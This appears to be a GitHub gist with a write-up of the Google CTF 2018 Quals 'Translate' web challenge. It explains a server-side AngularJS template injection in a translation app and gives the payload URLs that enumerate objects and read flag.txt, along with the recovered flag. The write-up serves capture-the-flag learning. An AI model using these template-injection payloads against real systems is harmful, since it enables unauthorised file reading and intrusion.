Created
June 25, 2018 10:12
-
-
Save beched/4f83b96b3f6d5c4f61534acbd8b5107c to your computer and use it in GitHub Desktop.
Google CTF 2018 Quals: Translate web task solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This web application implements a translation service with dictionary stored in memory. | |
| One can dump the JSON dictionary and add values to it. | |
| Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are rather web-site messages, not the words). | |
| The solution is to overwrite the rendered dictionary value and to enumerate methods accessible inside AngularJS sandbox and find a method which allows local file inclusion. | |
| Executing Object.keys(): | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}} | |
| Reading the flag: | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{this.$parent.$parent.i18n.template(%27flag.txt%27)}} | |
| or simply: | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.template(%27flag.txt%27)}} | |
| => | |
| Result can be accessed on http://translate.ctfcompetition.com:1337/?query=in_lang_query_is_spelled&lang=fr: | |
| CTF{Televersez_vos_exploits_dans_mon_nuagiciel} | |
| One could also just bruteforce or guess the method name ("template"). |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment